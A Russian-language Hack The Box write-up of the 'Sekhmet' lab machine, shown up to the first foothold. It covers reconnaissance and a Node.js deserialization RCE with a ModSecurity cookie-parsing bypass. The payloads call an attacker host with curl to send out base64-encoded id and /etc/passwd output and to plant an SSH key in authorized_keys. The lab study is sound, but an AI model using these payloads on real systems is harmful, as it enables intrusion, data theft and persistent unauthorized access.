В этом рай­тапе я покажу, как экс­плу­ати­ровать уяз­вимость при десери­али­зации Node.js с обхо­дом ModSecurity. Затем взло­маем ZIP-архив и бла­года­ря Kerberos повысим при­виле­гии на пер­вом хос­те. Пос­ле это­го зах­ватим кон­трол­лер домена, про­экс­плу­ати­ровав RCE.

Все это — в рам­ках про­хож­дения тре­ниро­воч­ной машины Sekhmet с пло­щад­ки Hack The Box. Ее уро­вень слож­ности — «безум­ный».

warning Под­клю­чать­ся к машинам с HTB рекомен­дует­ся толь­ко через VPN. Не делай это­го с компь­юте­ров, где есть важ­ные для тебя дан­ные, так как ты ока­жешь­ся в общей сети с дру­гими учас­тни­ками.

Разведка

Сканирование портов

Пер­вым делом добав­ляем IP-адрес машины в / etc/ hosts :

10. 10. 11. 179 sekhmet. htb

И запус­каем ска­ниро­вание пор­тов.

Справка: сканирование портов Ска­ниро­вание пор­тов — стан­дар­тный пер­вый шаг при любой ата­ке. Он поз­воля­ет ата­кующе­му узнать, какие служ­бы на хос­те при­нима­ют соеди­нение. На осно­ве этой информа­ции выбира­ется сле­дующий шаг к получе­нию точ­ки вхо­да. На­ибо­лее извес­тный инс­тру­мент для ска­ниро­вания — это Nmap. Улуч­шить резуль­таты его работы ты можешь при помощи сле­дующе­го скрип­та: #!/ bin/ bash ports = $( nmap -p- --min-rate = 500 $1 | grep ^[ 0- 9] | cut -d '/ ' -f 1 | tr '\ n' ', ' | sed s/, $/ / ) nmap -p $ports -A $1 Он дей­ству­ет в два эта­па. На пер­вом про­изво­дит­ся обыч­ное быс­трое ска­ниро­вание, на вто­ром — более тща­тель­ное ска­ниро­вание, с исполь­зовани­ем име­ющих­ся скрип­тов (опция -A ).

Ви­дим два откры­тых пор­та: 22 — служ­ба OpenSSH 8.4p1 и 80 — веб‑сер­вер Nginx 1.18.0. При обра­щении к веб‑сер­веру сра­зу выпол­няет­ся редирект на дру­гой домен.

До­бав­ляем его в файл / etc/ hosts и сно­ва обра­щаем­ся к сай­ту.

10. 10. 11. 179 sekhmet. htb windcorp. htb

Точка входа

На сай­те ничего инте­рес­ного не находим. Но, учи­тывая, что мы наш­ли реаль­ное домен­ное имя, есть смысл прос­каниро­вать под­домены. Я это делаю с помощью ска­нера ffuf.

Справка: сканирование веба c ffuf Од­но из пер­вых дей­ствий при тес­тирова­нии безопас­ности веб‑при­ложе­ния — это ска­ниро­вание методом перебо­ра катало­гов, что­бы най­ти скры­тую информа­цию и недос­тупные обыч­ным посети­телям фун­кции. Для это­го мож­но исполь­зовать прог­раммы вро­де dirsearch и DIRB. Я пред­почитаю лег­кий и очень быс­трый ffuf. При запус­ке ука­зыва­ем сле­дующие парамет­ры: -w — сло­варь (я исполь­зую сло­вари из набора SecLists);

— сло­варь (я исполь­зую сло­вари из набора SecLists); -t — количес­тво потоков;

— количес­тво потоков; -u — URL;

— URL; -r — выпол­нять редирек­ты;

— выпол­нять редирек­ты; -fs — филь­тро­вать стра­ницы по раз­меру;

— филь­тро­вать стра­ницы по раз­меру; -fc — исклю­чить из резуль­тата отве­ты с кодом 403. Мес­то перебо­ра помеча­ется сло­вом FUZZ.

По­луча­ется вот такая коман­да:

ffuf -u 'http:// windcorp. htb/ ' -H 'Host: FUZZ. windcorp. htb' -w subdomains- top1million- 110000. txt -t 256 -fs 153

В ито­ге находим еще один сайт и добав­ляем его в файл / etc/ hosts .

10. 10. 11. 179 sekhmet. htb windcorp. htb portal. windcorp. htb

Сле­дующее дей­ствие при изу­чении сай­та — поиск скры­тых катало­гов и стра­ниц. Я сно­ва поп­робовал исполь­зовать ffuf, но это не дало резуль­татов, так как, ско­рее все­го, про­веря­ются заголов­ки. Что­бы не мучить­ся с ними, я стал ска­ниро­вать при помощи Burp Intruder.

И сно­ва ничего инте­рес­ного. У нас оста­лась толь­ко фор­ма авто­риза­ции, поэто­му поп­робу­ем ее обой­ти. Нас­коль­ко велико было мое удив­ление, ког­да получи­лось авто­ризо­вать­ся с логином и паролем admin: admin !

За­тем мое вни­мание прив­лекли cookie поль­зовате­ля. Ока­залось, что это закоди­рован­ные в Base64 дан­ные в фор­мате JSON. В целом по виду cookie очень похоже, что исполь­зует­ся Node.js. И мы можем утвер­ждать, что на сто­роне сер­вера про­исхо­дит десери­али­зация и исполь­зование этих дан­ных.

Поп­робу­ем поис­кать под­ходящие уяз­вимос­ти. Я без тру­да нагуг­лил статью Exploiting Node.js deserialization bug for Remote Code Execution, где опи­сано, как выявить и про­экс­плу­ати­ровать уяз­вимость при десери­али­зации дан­ных в Node.js. Я соб­рал и закоди­ровал наг­рузку, сле­дуя рекомен­даци­ям из статьи, но мой зап­рос был заб­локиро­ван.

В тек­сте стра­ницы находим упо­мина­ние ModSecurity, который и бло­киру­ет нам дос­туп.

Это оче­ред­ное зве­но цепоч­ки, про­дол­жаем раз­бирать­ся с сай­том и вник­нем в Node.js более под­робно.

Точка опоры

Node.js RCE + байпас ModSecurity

ModSecurity — это WAF с откры­тым исходным кодом. Имен­но ModSecurity не дает нам подоб­рать­ся к при­ложе­нию. Но иног­да и в самих WAF находят уяз­вимос­ти. Так, быс­трый поиск в Google вывел меня на статью, где рас­ска­зано о CVE-2019-19886, поз­воля­ющей обой­ти ModSecurity. Уда­лось даже най­ти целый PoC для этой уяз­вимос­ти. Ее смысл зак­люча­ется в том, что мы исполь­зуем ошиб­ку в пар­сере ModSecurity и как бы пря­чем наг­рузку, переда­вая Cookie param=payload сле­дующим обра­зом:

param=payload=real_ value

Тог­да при­ложе­ние рас­парсит куки как param: payload , а WAF — как param: payload=value , что поз­волит миновать филь­тры.

Для экс­плу­ата­ции RCE в Node.js нам нуж­но передать наг­рузку через параметр username в сле­дующей конс­трук­ции:

{ " username " : " _$$ND_FUNC$$_function(){}( ) " }

За­тем закоди­руем ее в Base64 и вста­вим в cookie как profile=payload=value .

Пер­вым делом откро­ем лис­тенер nc -nlvp 80 и поп­робу­ем выпол­нить зап­рос на свой сер­вер через curl:

{ " username " : " _$$ND_FUNC$$_function(){ require( " child_process " ). exec( " curl http : // 10. 10. 14. 29", function( error, stdout, stderr){});}() "} '

В ито­ге на наш лис­тенер при­шел зап­рос, а это зна­чит, что мы добились RCE. Выпол­нить реверс‑шелл не получи­лось, поэто­му поп­робу­ем записать ключ SSH. Нам нуж­но знать имя поль­зовате­ля, которо­го мы исполь­зуем для выпол­нения команд. Его мож­но эксфиль­тро­вать, закоди­ровав в Base64 резуль­тат выпол­нения коман­ды id и вста­вив его как URI.

{ " username " : " _$$ND_FUNC$$_function(){ require( " child_process " ). exec( " curl http : // 10. 10. 14. 29/ $( id|base64 -w0) ", function( error, stdout, stderr){});}() "}

Так мы получа­ем имя текуще­го поль­зовате­ля. Теперь узна­ем, име­ет ли он дос­туп к коман­дной обо­лоч­ке, для чего получим запись из фай­ла / etc/ passwd .

{ " username " : " _$$ND_FUNC$$_function(){ require( " child_process " ). exec( " curl http : // 10. 10. 14. 29/ $( cat / etc/ passwd| grep webster|base64 -w0) ", function( error, stdout, stderr){});}() "}

Поль­зователь име­ет коман­дную обо­лоч­ку, теперь можем записы­вать ключ SSH. Для это­го сге­нери­руем пару клю­чей с помощью ssh-keygen и запус­тим в катало­ге с клю­чами веб‑сер­вер Python 3:

python3 -m http. server 80

За­тем ска­чаем ключ и запишем в файл authorized_keys .

{ " username " : " _$$ND_FUNC$$_function(){ require( " child_process " ). exec( " curl http : // 10. 10. 14. 29/ id_rsa. pub > ~/. ssh/ authorized_keys", function( error, stdout, stderr){});}() "}

Как толь­ко в логах веб‑сер­вера уви­дим обра­щение к пуб­лично­му клю­чу, мож­но авто­ризо­вать­ся по SSH.

Продвижение WEBSERVER.windcorp.htb